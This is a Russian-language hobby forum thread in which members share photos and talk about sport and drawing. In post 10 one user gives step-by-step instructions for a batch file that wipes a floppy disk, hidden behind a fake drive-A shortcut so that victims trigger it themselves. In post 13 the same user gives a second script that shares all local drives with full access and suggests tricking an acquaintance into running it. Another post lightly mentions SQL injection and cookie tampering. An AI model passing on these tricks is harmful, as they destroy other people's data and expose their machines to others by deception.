Славутичский форум

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Славутичский форум » Хобби (увлечения по-нашему) » Хвастаемся чем умеем


Хвастаемся чем умеем

Сообщений 1 страница 30 из 127

1

Последнее время я стала тащиться от фоток. Правда фоткаю я на паршивенькую камеру мобильника, поэтому качество не из лучших...

Фотка первая.
Весна недалеко от моего дома...

0

2

Фотка вторая.
Дендропарк "Софиевка" в Умани. Начало мая. Фоткала коней, когда они проносились мимо...

0

3

Фотка третья.
Поехали за грибами и нашли землянику. Пришлось фоткать на пакете "Сильпо" (это не реклама)

0

4

Фотка четвертая.
Ранняя весна. Шла с лицея и сфоткала возле дома.

0

5

Ну у меня иногда выходит чейнить комп взламать

0

6

L@mer
=)))

0

7

умею много чё - но хвастаться не люблю =)

0

8

2 ^Sokol^
Респект! Я тож хвастатся не люблю и не буду  :P

0

9

Ну хорошо, пусть будет не "хвастаемся", а делимся...

0

10

Делимся? Ну тода опытом делимся
Могу росказать как зделать жырное западло на какомнибуть общем компютере за 1 мин.
1 убираем значок диска А с робочего стола
2 открываем блокнот
3 пишем в нем
ECHO OFF
Y|del a:\*.*

4 и сохраняем его как prikol.bat (гденибуть в незаметном месте желательно)
5 делаем ярлык на етот файл на робочем столе и меняем ярлыку значок на дискетку и переименовываем в Диск А (также как было в оригинале)

Обычно люди впихают дискету и незадумываясь нажымают на значок но дискета вместо того чтоб открится очищается
(Даный прикол можно модифицыровать например на удаление только документов или еще чего нибуть + нетребуются знания языков програмирования  + ниодин антивирус или другая подобная прога никогда необнаружыт такие приколы)
За использование даного прикола ВЫ несете ответственность перед своей совестью

Отредактировано L@mer (2006-08-22 09:02:48)

0

11

2 L@mer
та это примитив... я такие приколы в третем класе мутил))) ну ладно... не в третем, но все равно это примитив)
если у кого нить есть линукс поиграйтесь в русскую рулетку лучше) кто не знает как могу рассказать
расказал бы лучше как вручную сформировать хттп-запрос и послать на удаленный сервер) - последнее время это очень интересует, а инет впадлу рыть, тем более я щас уезжаю на пару дней) ты пока научись потом мне расскажешь)

0

12

JetMind
вручную сформировать хттп-запрос и послать на удаленный сервер - это прям из адресной строки в любом браузере. Ты конкретно не написал цель запроса :)

0

13

JetMind
В том и фишка шо ето примитив делается кругом за менее чем минуту и его осилит любой ето ж те не хакерский форум а потом посиди повтыкай на происходящее
и вот еще один примитив
создать бат файл такого содержания
echo off
net share C$ /delete
net share C=C:\ /UNLIMITED
net share D$ /delete
net share D=D:\ /UNLIMITED
net share E$ /delete
net share E=E:\ /UNLIMITED

после етого какнибуть заставить его запустить знакомого
и у него розшарятся диски на запись и удаление

Отредактировано L@mer (2006-08-23 08:40:56)

0

14

2 buffer_overflow
я уже сам разобрался, но выслущаю и твой вариант))
цель запроса - чтобы сервер думал что запрос послан с конкретной страницы на этом сервере

0

15

2 JetMind

Ты опять-таки не написал конкретную цель запроса. Что именно он должен делать??? Хм... чтобы сервер думал что запрос послан с конкретной страницы на этом сервере. А какие данные надо получить-то??? скуль-инжекшн в таком случае, либо переменные "?id" и т.д. с вариациями... можно кукисы попробовать. Всё ещё зависит от вида и версии сервера.

Отредактировано buffer_overflow (2006-08-23 23:31:26)

0

16

ладно... не важно) просто как в строке браузера сформировать любой запрос я так и не догнал... насколько я знаю в строке браузера можно послать данные только методом GET, а если я хочу POST'ом?

0

17

да тут весь форум хоть от части да програмист ...... все всё это знают =)
так что довайте самым не обычным и интерестным ..... как тут говорят - поделитесь =)

0

18

В футбол умею играть...

0

19

Эх... Вот я в молодости... Проги-шутки на Делфи писал... За пять минут можно такую прогу наваять, что юзера инфаркт хватит :))

0

20

А я  , хех , не буду сильно долго вас парить , язаками люблю *[орудовать]* , ну и многое другое  :P  :D

Отредактировано YVN"[Linux forever] (2006-10-07 16:08:19)

0

21

Хорошо вас всех так понесло....вернусь к теме. В Общем, увлекаюсь, даже можно сказать очень, слаломом на роликах. Так же всяким там hand-made'ом и занимаюсь плаванием. Обажаю волейбол!

0

22

YVN"[Linux forever написал(а):

]А я  , хех , не буду сильно долго вас парить , язаками люблю *[]* , ну и многое другое

Буду банить!

0

23

Aiten написал(а):

и занимаюсь плаванием.

а я тож , бил в спорт - групе , но потом ушол , немог уделять время плаванию

0

24

а давай не будеш , е то же не мат (ну там мат , но не 3-х етажний же ) пзвините мисё , если вам ето не понравилось  :pardon:

Отредактировано YVN"[Linux forever] (2006-10-07 16:08:59)

0

25

Еще не хватало, чтоб ты трехэтажные тут писал!

0

26

А я рисовать люблю...

0

27

Девушка дождя
Классный рисунок...

0

28

DarkAngel
Это чуть ли не единственный который мне самой нравиться...

0

29

КрУтО

0

30

Я тоже рисовать люблю. И у меня хорошо получается (вроде). Девушка дождя видела. Только жалко вот скана нет. Может быть тоже бы поместила...

0


Вы здесь » Славутичский форум » Хобби (увлечения по-нашему) » Хвастаемся чем умеем